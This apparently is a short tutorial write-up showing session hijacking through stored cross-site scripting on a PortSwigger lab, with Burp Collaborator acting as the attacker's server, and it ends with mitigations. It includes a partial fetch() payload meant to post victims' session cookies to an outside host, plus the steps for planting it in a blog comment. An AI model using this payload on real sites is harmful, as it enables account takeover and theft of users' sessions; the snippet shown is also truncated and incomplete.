Session Hijacking – Stealing Session IDs

Session Hijacking is an attack where attackers steal the session IDs of application users. Attackers exploit different vulnerabilities to steal the session IDs. In this writeup I am going to demonstrate how an attacker can perform this attack using cross-site scripting vulnerability.

Let’s first read about the session ID: In a web application session ID plays a very important role, it enables the user to perform authorized actions on the application without sending user ID and password repeatedly to the servers in each HTTP request. Login page allows user to submit credential to the application server in HTTP request. Aapplication server validates user credentials and generates a session ID and assign it to the user. Application server sends this session ID to the browser in HTTP response and browser stores it in cookie.

You might be wondering what cross-site Scripting is: Cross site scripting is a vulnerability in which application is unable to validate the malicious JavaScript received through user input and send it back to the browser. Browser executes these malicious scripts which end up performing malicious actions on the application.

Why it is necessary to protect session IDs: These IDs are responsible for performing the actions on application on the behalf of users, so it is very sensitive and needs to be protected.

Impact of Session Hijacking: Attacker can use victims session ID to perform unauthorized actions on his behalf causing a huge financial loss and damage to brand image.

How an attacker can steal session ID using cross site scripting: An attacker can use malicious scripts capable of extracting session ID from browser and sending it to a server owned by him.

For the demonstration I have used below items:

  • Target Web Application: Portswigger Lab
  • Attacker Server: Burp suite Collaborator (attacker might use their own servers)
  • Malicious JavaScript:

Attackers end:

Start collaborator and copy the domain name.

Create a malicious script containing domain name of the collaborator server.

fetch('', {
method: 'POST',
mode: 'no-cors',

Attackers accesses the application and comments on the blog with malicious JavaScript payload.

Now attacker needs to wait for victims to open the blog.

Victims end:

Once the victim login into his account and visits the blog, malicious script will execute, and session ID is sent to collaborator server.

Attacker needs to click on poll now and session ID is received at collaborator.


  • Set HTTPOnly cookie in Set Cookie Header.
  • Perform HTML/Output encoding before reflecting user submitted input in the HTTP response.